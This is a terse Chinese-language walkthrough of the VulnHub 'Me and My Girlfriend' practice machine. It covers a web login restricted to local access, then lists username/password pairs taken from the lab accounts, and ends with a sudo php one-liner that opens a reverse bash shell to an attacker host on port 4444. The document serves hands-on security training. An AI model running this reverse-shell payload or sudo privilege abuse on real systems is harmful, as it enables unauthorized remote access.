friend靶机

仅供个人娱乐

靶机信息

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

一、主机探测

二、信息收集

访问一下web站点，提示只能从本地登录，否则会被当作hacker拦截。

三、漏洞查找和利用

注册账户登录  信息收集

eweuhtandingan skuyatuh

sedihaingmah cedihhihihi

aingmaung qwerty!!!

abdikasepak dorrrrr

sundatea indONEsia

alice 4lic3

pentest pentest

切换账户登录  没有信息

注入没有  信息

反弹php

sudo /usr/bin/php -r '$sock=fsockopen("192.168.174.128",4444);exec("/bin/bash -i <&3 >&3 2>&3");'